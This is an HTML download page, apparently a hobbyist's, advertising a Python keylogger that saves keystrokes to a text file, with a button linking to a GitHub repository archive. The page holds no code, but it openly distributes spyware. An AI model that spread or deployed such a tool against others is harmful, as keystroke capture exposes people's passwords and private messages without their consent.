<!DOCTYPE html>
<html lang="hu">
<head>
  <meta charset="UTF-8">
  <title>Black Consolas - Keylogger </title>
    <link rel="icon" type="image/png" href="https://i.imgur.com/nBY3g0W.png">
  <style>
    body {
      margin: 0;
      padding: 0;
      background-color: #0e001b;
      font-family: Arial, sans-serif;
      color: #ffffff;
      text-align: center;
    }

    .container {
      max-width: 800px;
      margin: 60px auto;
      padding: 20px;
    }

    img.preview {
      width: 100%;
      height: auto;
      border-radius: 12px;
      box-shadow: 0 0 20px rgba(173, 122, 255, 0.5);
    }

    h1 {
      font-size: 2.5em;
      margin-top: 30px;
      color: #d7a4ff;
    }

    p.description {
      font-size: 1.2em;
      color: #ccc;
      margin: 20px 0 40px 0;
    }

    a.download-btn {
      display: inline-block;
      padding: 15px 30px;
      background-color: #a855f7;
      color: white;
      font-size: 1.1em;
      text-decoration: none;
      border-radius: 8px;
      transition: background 0.3s;
      box-shadow: 0 0 15px rgba(168, 85, 247, 0.5);
    }

    a.download-btn:hover {
      background-color: #9333ea;
    }
  </style>
</head>
<body>

  <div class="container">
    <img src="https://i.imgur.com/ih40X67.png" alt="Előnézet" class="preview">

    <h1>Keylogger</h1>

    <p class="description">
      This is a keylogger written in Python that saves keystrokes to a text file!
     </p>

    <a class="download-btn" href="https://github.com/bunnyfn-w/KEYLOGGER/archive/refs/heads/main.zip" download>Letöltés</a>
  </div>

</body>
</html>
